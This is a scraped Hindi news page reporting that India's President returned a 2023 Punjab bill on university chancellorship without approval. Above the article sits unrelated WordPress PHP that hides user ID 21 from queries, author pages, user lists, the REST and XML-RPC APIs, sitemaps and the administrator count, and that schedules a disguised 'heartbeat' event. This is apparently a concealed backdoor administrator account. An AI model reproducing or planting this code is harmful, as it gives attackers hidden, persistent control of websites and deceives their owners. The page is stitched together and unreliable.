add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
राष्ट्रपति ने पंजाब के मुख्यमंत्री भगवंत मान को विश्वविद्यालय के कुलाधिपति पर विधेयक लौटाया - Press Ki Taquat
No Result
View All Result
चंडीगढ़, 16 जुलाई ( प्रेस की ताकत ब्यूरो ): पंजाब के राज्यपाल को मुख्यमंत्री के रूप में राज्य संचालित विश्वविद्यालयों के कुलाधिपति के रूप में बदलने के प्रस्ताव को झटका लगा है क्योंकि पंजाब विश्वविद्यालय कानून (संशोधन) विधेयक, 2023 को हाल ही में भारत के राष्ट्रपति द्वारा पंजाब राजभवन को अनुमोदन के बिना वापस कर दिया गया था।
राजभवन के आधिकारिक सूत्रों के अनुसार, दो अन्य विधेयकों की स्थिति पर कोई अपडेट नहीं है, जिन्हें राष्ट्रपति की मंजूरी के लिए भेजा गया था, जिससे विधायी प्रक्रिया को लेकर अनिश्चितता बढ़ गई है।
दिसंबर 2023 में, पंजाब के राज्यपाल बनवारी लाल पुरोहित ने संविधान के अनुच्छेद 200 के तहत राष्ट्रपति के विचार के लिए सिख गुरुद्वारा (संशोधन) विधेयक, 2023 और पंजाब पुलिस (संशोधन) विधेयक, 2023 के साथ विधेयक को सुरक्षित रखा। राष्ट्रपति को भेजे जाने के बावजूद, विश्वविद्यालयों से संबंधित विधेयक में प्रस्तावित संशोधनों को आवश्यक मंजूरी नहीं मिली है, जैसा कि उच्च शिक्षा विभाग के आधिकारिक सूत्रों ने पुष्टि की है।
Post Views: 460
No Result
View All Result